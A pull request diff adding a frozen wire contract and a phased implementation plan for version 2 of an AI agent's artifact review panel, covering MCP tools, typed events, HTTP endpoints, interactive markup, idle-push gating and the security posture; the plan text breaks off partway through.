### PR TITLE
feat(artifact-panel): v2 — reliability + interactivity + idle-gate hardening

### DIFF
--- a/docs/architecture/artifact-panel-v2-contract.md
+++ b/docs/architecture/artifact-panel-v2-contract.md
@@ -1,0 +1,421 @@
+# Artifact Panel v2 — FROZEN Wire Contract
+
+Status: **FROZEN v2.2** (2026-07-02). Contract architect: consumer instance (ai-or-die owns the
+interaction model). Reconciles `docs/research/artifact-panel-v2-consumer-brief.md` (consumer) and the
+producer brief (github-router). Both repos implement in parallel against THIS document. Breaking changes
+require a new version header + a superseding ADR.
+
+Changelog: **v2.2** — human review: (a) DROPPED the view-ticket/HMAC item — the security boundary is the
+Tailscale/devtunnel mesh + proven transport, not a home-rolled token; artifacts are agent-authored/trusted
+and the bearer in the iframe URL grants an on-mesh reader nothing it lacks. (b) MULTI-SELECT made explicit:
+`choose` (one) vs `check`+`submit` (a set), carried by a `data-aod-group` aggregation.
+
+Changelog: **v2.1** — ratified with notes: added `POST /:id/refresh`; typed `/update` schema + tagged-400
+`INVALID_REQUEST` wire signal; `mode` is a producer-only renderer hint (no `/open` wire change);
+`idempotencyKey` dedupe for retried non-idempotent POSTs; single-shot dismiss/refresh; auto-open stays
+static; `/history` is browser-only (agent resync via `artifact_await` with an old/absent cursor);
+`next_step` is an allowed additive field on every tool result.
+
+Baseline: ai-or-die main @ `68ef947`. Repos: **consumer** = ai-or-die (panel, SDK, `/api/artifact/*`,
+bridge); **producer** = github-router (MCP `artifact_*` tools, plan→HTML renderer, `internal-artifact-open`
+hook, `gh-artifact-review` skill). No source file is shared across the two repos.
+
+Forward-compat rule (applies everywhere): **unknown ArtifactEvent `kind`s, unknown MCP params, and unknown
+SSE event names MUST be ignored, never error.** This is what lets us extend the frozen surface later.
+
+---
+
+## 1. MCP tool surface (producer-exposed, agent-facing)
+
+Final set = **7 tools**. All remain gated on the `AIORDIE_BASE_URL` / `AIORDIE_TOKEN` / `AIORDIE_SESSION_ID`
+env trio (unchanged). `artifact_poll` is retained as a **frozen back-compat alias** (8th name, old shape).
+
+```ts
+// --- lifecycle ---------------------------------------------------------------
+artifact_open({ file: string, mode?: "static" | "interactive" })
+  -> { viewUrl: string, sessionId: string, key: string }
+  // mode defaults to "static". mode is a PRODUCER-ONLY renderer hint: it selects whether the plan->HTML
+  // renderer EMITS data-aod-* controls. It is NOT sent to the server — POST /:id/open body stays {file}
+  // (§3 Unchanged). The panel/SDK wire ANY data-aod-* markup they find regardless of mode, so an
+  // interactive artifact works in any panel and static artifacts stay annotate-only. (OQ item 3.)
+
+artifact_update({ file?: string, html?: string, idempotencyKey?: string })
+  -> { ok: true, viewUrl: string }
+  // Replace the CURRENT review's content. `file` must pass validatePath (sandbox). `html`, if given,
+  // is WRITTEN BY THE SERVER to the review's existing sandboxed file path, then reloaded — it is NEVER
+  // rendered from an unsandboxed over-the-wire blob (see OQ3). Exactly one of file|html. Violations
+  // (both, neither, html without an existing review file, out-of-base file) return the tagged-400
+  // INVALID_REQUEST wire signal (§3.1). idempotencyKey dedupes a retried write (§1.1).
+
+artifact_refresh({})
+  -> { ok: true }
+  // Force a content reload from disk (re-read + broadcast reload) with no content change. For when the
+  // agent edited the file out-of-band and does not want to rely on the chokidar watcher. Single-shot
+  // (not auto-retried, §1.1) — a lost refresh is harmless; the agent may simply call it again.
+
+artifact_dismiss({})
+  -> { ok: true }
+  // Hide the panel UI; the review stays ALIVE (feedback channel open, queue preserved). Distinct from
+  // end. The human sees a re-open affordance. Idempotent (dismiss-after-dismiss is ok:true). Single-shot
+  // (not auto-retried, §1.1).
+
+artifact_end({ idempotencyKey?: string })
+  -> { ok: true, status: "ended" }
+  // Terminate the review: status=ended, watcher stopped, final `ended` event emitted. Any human feedback
+  // still queued at end time is delivered on the agent's NEXT drain, FOLLOWED by the `ended` event
+  // (end never silently drops unsent feedback). end-after-end (or end on an already-ended review) returns
+  // { ok:true, status:"ended" }, NOT NOT_FOUND, so a retried end is safe (§1.1).
+
+// --- messaging ---------------------------------------------------------------
+artifact_await({ cursor?: string, timeoutMs?: number })
+  -> { events: ArtifactEvent[], status: ReviewStatus, cursor: string }
+  // Typed drain (supersedes poll). Long-holds up to timeoutMs (server cap DEFAULT_POLL_HOLD_MS, ~25s;
+  // client budgets multiple attempts as today). Returns events > cursor; echoes the new high-water
+  // `cursor` the agent passes next call. Delivery is idempotent by (cursor, event.id): re-passing an
+  // old cursor re-delivers (safe); the server marks events delivered but keeps a bounded replay buffer.
+
+artifact_reply({ text: string })
+  -> { ok: true }
+  // Free-text agent->human message. Rendered in panel chat (SSE). NOT auto-retried (§1.1).
+
+// --- back-compat alias (FROZEN, do not extend) -------------------------------
+artifact_poll({ timeoutMs?: number })
+  -> { status, prompts, next_step, layout_warnings?, dom_snapshot? }   // OLD payload, unchanged
+  // Serves existing skill/CLAUDE.md. Returns only `comment`-equivalent free-text prompts (NOT actions).
+  // New agents MUST use artifact_await.
+```
+
+`ReviewStatus = "open" | "ended" | "missing"`.
+
+Every tool result MAY additionally carry a `next_step: string` guidance field (the producer appends one
+today). It is an ALLOWED ADDITIVE field under the forward-compat rule — consumers/clients MUST preserve
+and never reject it. (OQ item 8.)
+
+### 1.1 Retry + idempotency (non-idempotent POSTs)
+
+Retry/backoff on transient `UNREACHABLE`/`TIMEOUT` is applied **only** to POSTs made safe against
+double-apply:
+
+| Tool | Auto-retry? | Duplicate prevention |
+|---|---|---|
+| `artifact_open` | yes | naturally idempotent (re-open of the same file returns the same review) |
+| `artifact_update` | yes | `idempotencyKey` — server dedupes; a repeat key is a no-op returning the first result |
+| `artifact_end` | yes | `idempotencyKey` **and** end-after-end returns `{ok:true,status:"ended"}` (never NOT_FOUND) |
+| `artifact_reply` | **no** | not auto-retried (a duplicate is a visible chat bubble); model re-sends if needed |
+| `artifact_refresh` | **no** | single-shot; a lost refresh is harmless, call again |
+| `artifact_dismiss` | **no** | single-shot; idempotent server-side, so a manual repeat is safe anyway |
+| `artifact_await` / `artifact_poll` | yes (long-poll re-arm) | cursor-idempotent: re-passing a cursor re-delivers safely (no side effect) |
+
+`idempotencyKey` is client-generated, unique per logical operation (fleet client has precedent), sent in
+the POST body; the server remembers recent keys per session and returns the original result for a repeat.
+
+Error taxonomy: `UNREACHABLE | AUTH_FAILED | NOT_FOUND | TIMEOUT | UPSTREAM_ERROR | INVALID_RESPONSE |
+INVALID_REQUEST`. `INVALID_REQUEST` is carried by the tagged-400 wire signal (§3.1).
+
+---
+
+## 2. `ArtifactEvent` — the discriminated union (SSE push + `artifact_await` drain)
+
+ONE schema serves both channels. Every event carries a stable per-session monotonic `id` (string of an
+integer, gap-free, starts at "1") for single-delivery ack.
+
+```ts
+type ArtifactEvent =
+  | { kind: "comment"; id: string; prompt: string; text: string;
+      selector: string; sourceLine?: number; target?: TextRangeTarget }
+  | { kind: "action";  id: string; action: string; value?: string;
+      elementId: string; group?: string; selected?: SelectedItem[];
+      selector?: string; sourceLine?: number }
+  | { kind: "ended";   id: string };
+
+type SelectedItem = { elementId: string; value?: string };  // members of a submitted multi-select set
+
+type TextRangeTarget = {                     // unchanged from today's SDK (artifact-sdk-client.js:180-188)
+  type: "text-range"; text: string; selector: string; commonAncestorSelector: string;
+  start: { selector: string; path: number[]; offset: number };
+  end:   { selector: string; path: number[]; offset: number };
+};
+```
+
+- `comment` = today's free-text annotation (a clicked block or selected text + a prompt). Bare-string
+  composer notes map to `{kind:"comment", prompt:<text>, text:"", selector:""}`.
+- `action` = a `data-aod-*` control activation (§4). `action` = the `data-aod-action` verb;
+  `elementId` = the `data-aod-id`; `value` = `data-aod-value` (or a checkbox's checked state as
+  `"true"`/`"false"`). **Multi-select:** a `submit` action carries `group` (the `data-aod-group` it
+  submits) and `selected` (the currently-checked members of that group, each `{elementId, value?}`); a
+  single `choose` fires one action event with no `selected`. `check` toggles are UI-local and do NOT emit
+  their own event — only the `submit` does (see §4).
+- `ended` = the review terminated; always the LAST event.
+- **Reserved future kinds** (`dismissed`, `presence`, …) — not required in v2.1; both sides ignore
+  unknown kinds.
+
+Single-delivery contract: the server assigns `id` at enqueue, keeps a bounded replay buffer
+(≥200 events/session). `artifact_await` returns events with `id > cursor` and echoes the max `id` as the
+new `cursor`. SSE emits each event with the SSE `id:` field so `EventSource` `Last-Event-ID` replays the
+gap on reconnect.
+
+---
+
+## 3. HTTP endpoints — `/api/artifact/:sessionId/*`
+
+New (**N**) / Changed (**C**) / Unchanged (**U**). All sit behind ai-or-die's existing auth on the mesh
+origin (§7).
+
+| Method | Path | Status | Purpose |
+|---|---|---|---|
+| POST | `/:id/open` | U | agent opens; body `{file}` only — `mode` is NOT sent (producer-only hint, §1) |
+| GET  | `/:id/view` | U | serves SDK-injected HTML (existing auth — see §7) |
+| GET  | `/:id/sdk.js` | U | injected SDK |
+| GET  | `/:id/asset/_auth/<assetToken>/*` | U | sandboxed sibling assets (path-token, already safe) |
+| POST | `/:id/prompts` | U | free-text/annotation feedback (human→agent); idle-push applies |
+| POST | `/:id/actions` | **N** | structured action feedback (human→agent); idle-push/respond routing applies |
+| POST | `/:id/layout-warnings` | U | legacy layout warnings |
+| POST | `/:id/update` | **N** | agent replaces content (§3.2); tagged-400 on invalid input (§3.1) |
+| POST | `/:id/refresh` | **N** | force content reload from disk, no content change → `{ ok: true }` |
+| POST | `/:id/dismiss` | **N** | hide panel, keep review alive (server-authoritative visibility) → `{ ok: true }` |
+| POST | `/:id/end` | U | terminate review; end-after-end → `{ ok:true, status:"ended" }` (never 404) |
+| POST | `/:id/agent-reply` | U | agent→human free text (SSE render only — see §5) |
+| GET  | `/:id/await?cursor=&timeoutMs=` | **N** | typed drain → `{ events, status, cursor }` |
+| GET  | `/:id/poll` | U (frozen) | legacy long-poll, OLD payload |
+| GET  | `/:id/history` | **N** | **browser-only** replay for reconnect/rehydrate; NOT an MCP tool (§3.3) |
+| GET  | `/:id/events` | **C** | SSE; adds typed `artifact-event` messages with `id:` + real `presence.state` |
+
+### 3.1 Tagged-400 `INVALID_REQUEST` wire signal
+Any endpoint that rejects a well-formed-but-invalid request returns **HTTP 400** with body
+`{ error: { code: "INVALID_REQUEST", message: string } }`. The producer client maps `status===400 &&
+body.error.code==="INVALID_REQUEST"` → the `INVALID_REQUEST` taxonomy value (today `mapHttpError` keys only
+on status and would mis-map 400→UPSTREAM_ERROR). This convention applies everywhere INVALID_REQUEST can
+arise (currently `/update`; any future validation). Other 4xx/5xx keep today's status-based mapping.
+
+### 3.2 `POST /:id/update`
+```ts
+// body — exactly one of file|html:
+{ file?: string, html?: string, idempotencyKey?: string }
+-> 200 { ok: true, viewUrl: string }
+// 400 { error: { code: "INVALID_REQUEST", message } }  when: both file+html, neither, out-of-base file,
+//     or html with no existing review file. `html` is written by the server to the review's sandboxed
+//     file path (never rendered from an unsandboxed blob), then a reload is broadcast (same path as a
+//     file-watch change). A repeated idempotencyKey returns the first result without re-writing.
+```
+
+`POST /:id/actions` body:
+```ts
+{ actions: Array<{ action: string; elementId: string; value?: string;
+                   group?: string; selected?: Array<{ elementId: string; value?: string }>;
+                   selector?: string; sourceLine?: number }>,
+  domSnapshot?: object }
+-> { ok: true, pushed: boolean, queued: number }   // same shape as /prompts
+```
+
+### 3.3 `GET /:id/history` — browser-only
+```ts
+{ chat: Array<{ role: "you" | "agent"; text: string; at: string; id: string }>,
+  events: ArtifactEvent[],          // replay buffer (undelivered + recent)
+  status: ReviewStatus, cursor: string, visibility: "shown" | "dismissed" }
+```
+This endpoint exists for the PANEL only (reconnect/rehydrate). It is **not** exposed as an MCP tool and the
+producer builds no history client method: a post-compaction agent that lost its cursor resyncs by calling
+`artifact_await` with an absent/old `cursor`, which replays the bounded buffer (§2). (OQ item 7.)
+
+`GET /:id/events` SSE frames (each `data:` is JSON):
+```
+event: artifact-event   id: <n>   data: <ArtifactEvent>          # NEW typed push
+event: agent-reply                data: { text, reply }          # unchanged (SSE is the SOLE render path)
+event: presence                   data: { state, connected, lastSeen, pendingTool? }   # state now REAL
+event: ended                      data: { status: "ended" }      # unchanged
+```
+`presence.state = "idle_at_prompt" | "working" | "awaiting_input"` derived from the transcript (§6).
+
+---
+
+## 4. Declarative interactive vocabulary + SDK behavior
+
+Producer renderer emits (no JS inside the artifact; the injected SDK wires everything):
+
+```html
+<!-- choose-one (radio / decision): a single click emits one action event -->
+<button data-aod-action="approve" data-aod-id="plan-step-3">Approve</button>
+<button data-aod-action="reject"  data-aod-id="plan-step-3">Reject</button>
+<a data-aod-action="choose" data-aod-value="option-b" data-aod-id="decision-1">Option B</a>
+<li class="aod-step" data-aod-id="plan-step-3" data-source-line="42"> … </li>
+
+<!-- choose-multiple: toggle N checks in a group, then ONE submit emits the selected set -->
+<input type="checkbox" data-aod-action="check" data-aod-group="tasks" data-aod-id="task-7" data-aod-value="retry">
+<input type="checkbox" data-aod-action="check" data-aod-group="tasks" data-aod-id="task-9" data-aod-value="cache">
+<button data-aod-action="submit" data-aod-group="tasks" data-aod-id="tasks-go">Apply selected</button>
+```
+
+Attribute namespace (**SIGNED OFF**):
+- `data-aod-action` — **required**. The verb (`approve`|`reject`|`choose`|`check`|`submit`|`edit`|custom).
+- `data-aod-id` — **required, stable**. Echoed as `elementId`. The producer MUST keep it stable across
+  re-renders so acks/state map correctly.
+- `data-aod-value` — optional. Echoed as `value`.
+- `data-aod-group` — **required on `check` and `submit`**, ignored elsewhere. Ties a set of `check`
+  controls to the `submit` that harvests them. A `check` MUST share its group's exact string with its
+  `submit`.
+- `data-source-line` — **kept** (unchanged source-map anchor).
+
+**Choose-one vs choose-multiple (explicit):**
+- **Choose-one** (`approve`/`reject`/`choose`/custom, no group): the click emits ONE `action` event
+  immediately with `{action, elementId, value?}` and no `selected`.
+- **Choose-multiple**: `check` toggles are **UI-local only** — the SDK tracks checked state per
+  `data-aod-group` and emits **no event on toggle**. When the group's `submit` is clicked, the SDK emits a
+  single `action` event `{action:"submit", elementId:<submit's id>, group:<data-aod-group>, selected:
+  [{elementId, value?}, …]}` containing the currently-checked members of that group. An empty set is
+  allowed (emits `selected: []`) so "none selected" is expressible. The server does NOT aggregate loose
+  `check` events (there are none); the `submit` event is the whole, atomic set.
+
+**SDK capture change (scoped to `data-aod-*` ONLY):** today `isInteractiveControl`
+(`artifact-sdk-client.js:209-221`) makes native controls behave natively and the SDK forwards nothing.
+v2 adds a dedicated capture-phase listener:
+- An element matching `[data-aod-action]` (or an ancestor within it): on `click` (buttons/anchors) or
+  `change` (checkboxes/inputs). For `check` the SDK only updates its internal per-group set (no post). For
+  every other verb — including `submit` — it **posts `artifact-action`** (§8) and, for anchors/submit
+  buttons only, `preventDefault()`s the native navigation/submit. It does NOT open the annotation card.
+- Native controls WITHOUT `data-aod-action` keep today's behavior exactly (behave natively, no forward,
+  annotation suppressed). No regression for ordinary artifact chrome.
+- The SDK MUST require `data-aod-action` and `data-aod-id`, and additionally `data-aod-group` for
+  `check`/`submit`; a control missing a required attribute is ignored (dev error, never posted).
+
+Panel receives `artifact-action`, optimistically reflects step/selection state, and POSTs `/:id/actions`.
+
+---
+
+## 5. Push, both directions
+
+### agent → human — SSE is the SINGLE render path (fixes the double-render)
+`agent_reply` and typed `artifact-event`s render **only** via `GET /:id/events` (SSE). The WS
+`broadcastToSession('artifact_agent_reply', …)` render path is **REMOVED**; WS retains only the lifecycle
+nudges the panel needs when it is NOT SSE-connected: `artifact_review_opened`, `artifact_review_reload`,
+`artifact_review_dismissed` (new), `artifact_review_ended`. Chat/event rendering never comes over WS.
+
+### human → agent — durable drain + hardened idle push
+- Durable: `artifact_await` (typed) / `artifact_poll` (legacy) drain the queue; destructive-read acked on
+  response finish, backed by the replay buffer.
+- Idle push (ADR-0035, default ON): free-text `comment` feedback may be injected into an idle CLI as a new
+  turn. **Hardened idle gate (§6).**
+- Structured `action` feedback is **never bracketed-paste-injected as free text**. When it corresponds to a
+  pending user-facing tool (e.g. an `approve` while the transcript shows a pending `ExitPlanMode`), it is
+  routed through the existing structured **respond** path (`_controlRespond`), which maps a choice to the
+  pending tool. Otherwise it is delivered via the drain (and may wake the agent via the idle-push nudge if
+  the transcript says the agent is idle at a free-text prompt).
+
+---
+
+## 6. Idle-gate hardening (transcript = PRIMARY gate)
+
+`_pushArtifactFeedbackToAgent` (consumer, `server.js:4138`) MUST gate on the transcript BEFORE any PTY
+injection, using the already-present `detectAwaiting` (`src/control/jsonl-awaiting.js`) over the session's
+`AIORDIE_CLAUDE_BIND` JSONL binding (same lookup as `server.js:5044`):
+
+1. Resolve the session's JSONL binding. If `detectAwaiting(binding.file)` returns **non-null** → a
+   user-facing tool (ExitPlanMode / AskUserQuestion / permission) is pending → **HARD-DECLINE** any
+   free-text push. It stays queued for `artifact_await`; a matching structured action routes to respond
+   (§5). Rationale: a quiet PTY is exactly the menu case — bracketed-paste + CR would answer the menu.
+2. Positive idle signal: only allow a free-text push when the transcript's last non-sidechain event is a
+   completed assistant turn with **no** unresolved `tool_use` (turn done, CLI at the free-text prompt).
+   This is a small extension of `detectAwaiting` (add an `idleAtPrompt`/`turnComplete` classification).
+3. Secondary guard (kept): `msSinceLastOutput > AIORDIE_ARTIFACT_PUSH_QUIET_MS` (default 1500ms), covering
+   the render-in-progress window and the **no-binding fallback** (raw `claude.exe` whose slug doesn't
+   resolve — degrade to today's PTY-quiet-only behavior).
+4. Cache the transcript read (~1s, mirroring `_controlDetectAwaitingCached`) so per-`/prompts` cost is
+   bounded.
+
+`presence.state` on SSE is derived from the same signal: `awaiting_input` (pending user-facing tool),
+`idle_at_prompt` (turn complete), else `working`.
+
+---
+
+## 7. Security posture — mesh is the boundary, not a home-rolled token
+
+**Decision (human review, v2.2):** the security boundary is the **Tailscale / devtunnel mesh + the proven
+authenticated transport**, NOT a token we invent. We do NOT roll our own capability/token system for the
+artifact panel. Artifacts are **agent-authored and trusted**, served over a mesh-authenticated origin, so
+artifact JS reading the bearer from the iframe URL grants an on-mesh reader nothing an on-mesh actor lacks.
+The earlier "view ticket / HMAC" item is **DROPPED** — no `viewTicket`, no per-session HMAC for `/view`.
+
+- `/view` and `/sdk.js` keep today's existing auth (the panel builds the iframe URL with the same token it
+  already uses for the rest of ai-or-die). No new endpoint auth, no new secret.
+- Free hygiene only (do not gratuitously widen exposure): keep the existing sandbox attributes and the
+  existing sibling-asset path scoping as-is; do not add new ways for an artifact to reach outside its
+  directory. Introduce NO new token/capability surface.
+- The existing sandboxed-asset path token (`artifact-review.js:34-55, 569-575`) is unchanged — it predates
+  this contract and stays as the sibling-asset scoping mechanism; v2 adds nothing to it.
+
+---
+
+## 8. postMessage additions (iframe ⇄ panel)
+
+Sources unchanged: iframe→panel `source:"ai-or-die-artifact-sdk"`; panel→iframe
+`source:"ai-or-die-artifact-host"`. Existing types (ready/annotation-queued/annotations-send/snapshot/
+scroll/legacy prompts+warnings; set-annotation-mode/request-snapshot/restore-scroll/agent-reply/presence)
+are unchanged. New:
+
+```ts
+// iframe -> panel
+{ type: "artifact-action",
+  payload: { action: string, elementId: string, value?: string,
+             group?: string, selected?: Array<{ elementId: string, value?: string }>,
+             context: { selector?: string, sourceLine?: number, text?: string },
+             domSnapshot?: object } }
+
+// panel -> iframe
+{ type: "plan-state", payload: { steps: Array<{ elementId: string,
+             state: "pending" | "approved" | "rejected" | "done" }> } }   // optional affordance sync
+```
+
+---
+
+## 9. Lifecycle semantics — refresh vs dismiss vs end
+
+| Verb | Backing route | Review status | Panel | Queued feedback | Feedback channel |
+|---|---|---|---|---|---|
+| **refresh** | `POST /:id/refresh` | unchanged (`open`) | content reloads (iframe cache-bust) | preserved | open |
+| **dismiss** | `POST /:id/dismiss` | unchanged (`open`), `visibility="dismissed"` | hidden; re-open affordance shown | **preserved** | **open** (agent may update/await/reply) |
+| **end** | `POST /:id/end` | `ended` | closes | delivered on the next drain, THEN `ended` | closed after `ended` |
+
+Dismiss is server-authoritative (`POST /:id/dismiss` + `visibility` in `/history`) so a reconnecting panel
+and the `artifact_dismiss` tool agree. The human × triggers `POST /:id/dismiss` (not a client-only hide)
+and gets a re-open badge wired to the existing `expand()`. `refresh` is a distinct route from `update`
+(update changes content; refresh re-reads the same file) so `artifact_refresh` never needs an empty-body
+`update`.
+
+**Auto-open stays STATIC in v2.** The producer's `internal-artifact-open` PostToolUse hook (fires on
+ExitPlanMode) renders plan markdown to a sibling `.aiordie.html` and opens it as a **static** artifact —
+there is no typed step model there. Interactive mode is **opt-in only**, via an explicit
+`artifact_open({mode:"interactive"})` or `artifact_update` with model-authored `data-aod-*` HTML. The hook
+is not required to emit interactive markup in v2. (OQ item 6.)
+
+---
+
+## 10. Resolution of the producer's 5 open questions
+
+1. **SSE vs typed-poll vs both → BOTH.** `artifact_await` (typed drain, cursor-acked) is the agent's
+   PRIMARY, simplest, reconnect-safe path and what the skill uses; SSE `/events` is the panel's instant
+   push and MAY also be consumed by the agent client for low latency. One `ArtifactEvent` schema serves
+   both. Rationale: drain is the durable source of truth; SSE is the latency layer.
+2. **dismiss = new endpoint (not client-only).** `POST /:id/dismiss` + server `visibility`. Rationale: a
+   client-only hide cannot back the `artifact_dismiss` tool or survive a reconnect; it also reproduces the
+   current dead-end bug.
+3. **artifact_update: file-on-disk is source of truth; `html` is server-written to the sandboxed file.**
+   Rationale: preserves the `validatePath` sandbox and the single file-watch reload path; never render an
+   unsandboxed over-the-wire blob. `html` without an existing review file → `INVALID_REQUEST`.
+4. **Attribute namespace + event schema: SIGNED OFF.** `data-aod-action` (req), `data-aod-id`
+   (req, stable, → `elementId`), `data-aod-value` (opt), keep `data-source-line`. `ArtifactEvent` =
+   `comment | action | ended`; unknown kinds ignored.
+5. **Migration: additive, no flag-day.** Keep `artifact_poll` + `GET /poll` frozen (old shape); add
+   `artifact_await` + `GET /await` (typed). `/events` gains `artifact-event` frames without removing
+   `agent-reply`/`presence`/`ended`. Version via the forward-compat ignore rule (unknown kinds/params/SSE
+   names ignored). The `gh-artifact-review` skill + CLAUDE.md directive are updated to the new verbs but
+   the old names keep resolving.
+
+---
+
+## 11. Frozen invariants (do not violate without a new version)
+- One `ArtifactEvent` schema across SSE + drain; every event has a gap-free per-session `id`.
+- SSE is the SOLE agent→human render path (no WS double-render).
+- Security boundary is the mesh + existing transport auth; no new artifact-panel token/capability system.
+- Multi-select is carried by a `submit` action's `{group, selected[]}`; `check` toggles emit no event.
+- Free-text push is transcript-gated; structured actions route to respond, never bracketed-paste.
+- `html` content is always written to the sandboxed file before render; no unsandboxed blob rendering.
+- Unknown kinds / params / event names are ignored, never fatal.

--- a/docs/architecture/artifact-panel-v2-plan.md
+++ b/docs/architecture/artifact-panel-v2-plan.md
@@ -1,0 +1,160 @@
+# Artifact Panel v2 — Unified Implementation Plan
+
+Status: active. Pairs with the FROZEN contract `docs/architecture/artifact-panel-v2-contract.md` (v2.0).
+Two instances implement in parallel: **CONSUMER** = ai-or-die (this instance), **PRODUCER** = github-router
+(other instance). **No source file is shared across the two repos.** The contract is the only coupling.
+
+Ordering principle: **P0 = reliability + security FIRST** (the loop must be correct and safe before it gets
+richer), then **P1 = structured push + interactivity**, then **P2 = polish + real presence + full e2e**.
+Each phase lists CONSUMER tasks, PRODUCER tasks, acceptance criteria (how we verify), and the tests to add.
+
+File-ownership map (no overlap):
+- CONSUMER writes: `src/public/artifact-panel.js`, `src/artifact-sdk-client.js`, `src/artifact-review.js`,
+  `src/server.js` (push gate + endpoints),
+  `src/public/components/artifact-panel.css`, `src/control/jsonl-awaiting.js` (idle classification),
+  `test/control/artifact-routes.test.js`, `test/**` new unit tests, `e2e/tests/56-artifact-panel-v2.spec.js`.
+- PRODUCER writes: `src/lib/**/artifact*` MCP tools + client, plan→HTML renderer, `internal-artifact-open`
+  hook, `gh-artifact-review` skill, `CLAUDE.md` directive, github-router tests.
+
+---
+
+## Phase P0 — reliability + security (blocking; ship before P1)
+
+### CONSUMER (ai-or-die)
+- **C-P0-1 Kill the double agent-reply render.** Remove the WS render path; make SSE the sole render path
+  (contract §5). WS keeps only `artifact_review_opened|reload|dismissed|ended` lifecycle nudges. Touch:
+  `artifact-panel.js:375-385` (agentReply → stop appending chat), `server.js:1068`
+  (`agent-reply` broadcast → drop or demote to a non-render nudge).
+- **C-P0-2 Per-session queue + chat; stop dropping on tab switch.** Move `_queue` and chat into the
+  `reviews` Map (per sessionId). `notifyActiveSessionChanged` (`artifact-panel.js:387-393`) must NOT
+  `_clearQueue()`; `_show` (`402-417`) must NOT wipe `_chatLog` — instead rehydrate from `GET /history`.
+- **C-P0-3 Dismiss re-open affordance.** Wire × to `POST /:id/dismiss` (server-authoritative visibility)
+  and add a re-open badge → `expand()` (`artifact-panel.js:104,108,422-427`).
+- **C-P0-4 SSE reconnect replay.** Consume the SSE `id:`/`Last-Event-ID` replay; on (re)connect, call
+  `GET /history` and repaint chat + apply undelivered events. Server: add the bounded replay buffer +
+  `id:` on SSE frames + `GET /:id/history` (`artifact-review.js` store + `events` route).
+- **C-P0-5 SECURITY: DROPPED (v2.2).** The view-ticket/HMAC item is removed — the security boundary is the
+  mesh + existing transport auth, not a home-rolled token (contract §7). `/view` keeps today's auth; no
+  ticket, no auth.js change, no sandbox change required for security. (Slot kept for numbering stability.)
+- **C-P0-6 Idle-gate hardening (contract §6).** In `_pushArtifactFeedbackToAgent` (`server.js:4138`),
+  make `detectAwaiting` the PRIMARY gate: hard-decline free-text push when a user-facing tool is pending;
+  positive-push only on `idleAtPrompt`; keep `msSinceLastOutput` secondary + no-binding fallback. Add the
+  `idleAtPrompt`/`turnComplete` classification to `jsonl-awaiting.js`; cache the read (~1s).
+- **C-P0-7 Note composer failure recovery.** `_submitNote` (`artifact-panel.js:615-621`) must restore the
+  note + surface a retry on POST failure, mirroring `_sendQueue` (`600-612`).
+
+### PRODUCER (github-router)
+- **P-P0-1 Client retry/backoff.** ArtifactClient: retry transient `UNREACHABLE`/`TIMEOUT` on
+  `open`/`reply`/`end` (and future `update`) — close the single-shot gap.
+- **P-P0-2 Client unit tests.** Error taxonomy, timeout, `allowEmptyJson`, `artifact_reply` (currently
+  untested), real-payload tolerance.
+
+### P0 acceptance criteria (verify, don't assert)
+- Unit (consumer, `test/control/artifact-routes.test.js` + new `test/artifact-panel.test.js` via jsdom):
+  - Idle gate: with a mocked binding whose `detectAwaiting` returns a pending `ExitPlanMode`,
+    `_pushArtifactFeedbackToAgent` returns false (declined) even when PTY is quiet; with `idleAtPrompt`
+    it injects. **(C-P0-6)**
+  - `GET /history` returns prior chat + undelivered events + `cursor`; `artifact_await`/`poll` after an
+    ack does not re-deliver. Reconnect via `Last-Event-ID` yields exactly the gap. **(C-P0-4)**
+  - Panel unit: two tab switches preserve the per-session queue and chat; dismiss then re-open restores the
+    same review; a single agent reply renders once (SSE path only). **(C-P0-1,2,3)**
+- Unit (producer): retry succeeds after one transient failure; `artifact_reply` happy + error paths.
+- **One e2e (`e2e/tests/56-artifact-panel-v2.spec.js`, P0 slice):** open a static artifact → annotate a
+  block → Send → agent drains via `/await` → `artifact_reply` → assert chat shows the reply **once** →
+  dismiss → assert hidden + re-open badge → re-open → chat history intact.
+- Gate: `npm test` green on Windows + Linux.
+
+---
+
+## Phase P1 — structured push + interactivity
+
+### CONSUMER (ai-or-die)
+- **C-P1-1 Endpoints + typed events.** Add `POST /:id/actions`, `POST /:id/update` (typed body + tagged-400
+  `INVALID_REQUEST`, contract §3.1/§3.2), `POST /:id/refresh`, `POST /:id/dismiss`, `GET /:id/await`
+  (typed), `GET /:id/history` (browser-only), `artifact-event` SSE frames with `id:`; keep `GET /:id/poll`
+  legacy (old shape). Add per-session `idempotencyKey` dedupe for `/update` + `/end`, and make end-after-end
+  return `{ok:true,status:"ended"}` (never 404). Refactor the store: `queuePrompts`→ enqueue typed `comment`
+  events; add `enqueueAction`; `takeFeedback`/drain returns `ArtifactEvent[]` + cursor; legacy `/poll`
+  projects `comment` events back to the old `prompts` shape. Touch: `artifact-review.js` store + routes.
+- **C-P1-2 SDK `data-aod-*` capture (contract §4).** Add the scoped capture-phase listener for
+  `[data-aod-action]` (click/change), require `data-aod-id`, post `artifact-action`; leave non-`data-aod`
+  native controls exactly as today. Touch: `artifact-sdk-client.js:209-221,479-511`.
+- **C-P1-3 Panel action forwarding + state.** Handle `artifact-action` → optimistic `plan-state` →
+  `POST /:id/actions`; render the pill/step affordance. Touch: `artifact-panel.js:458-515,536-613`.
+- **C-P1-4 Structured-approval routing.** When an `action` maps to a pending user-facing tool, route via
+  the existing `_controlRespond` path instead of the queue/push. Touch: `server.js` `/actions` handler.
+- **C-P1-5 `artifact_update` server side.** `POST /:id/update`: `file` (validatePath) re-read, or `html`
+  written to the review's sandboxed file then reload-broadcast. Touch: `artifact-review.js`, `server.js`.
+
+### PRODUCER (github-router)
+- **P-P1-1 New MCP tools.** `artifact_open({mode})`, `artifact_update`, `artifact_refresh`,
+  `artifact_await` (+ `artifact_poll` alias), `artifact_dismiss` (keep `artifact_reply`/`artifact_end`).
+  Typed `ArtifactEvent` handling in the client + a drain loop that acks by cursor. Per contract §1.1:
+  auto-retry only `open`/`update`/`end`/`await` (with `idempotencyKey` on update+end); `reply`/`refresh`/
+  `dismiss` are single-shot. `mode` is NOT sent to the server (renderer hint only). `mapHttpError` gains
+  the tagged-400 → `INVALID_REQUEST` mapping (§3.1). No `/history` client method (agent resync = await with
+  an old/absent cursor, §3.3).
+- **P-P1-2 Interactive plan renderer.** Emit `data-aod-action`/`data-aod-id`/`data-aod-value` + `aod-step`
+  markup for `mode:"interactive"`; keep `data-source-line`; keep the existing HTML-escaping /
+  `javascript:`-neutralizing safety. Static mode unchanged.
+- **P-P1-3 Skill + directive.** Update `gh-artifact-review`: document push arrival, structured-vs-free-text
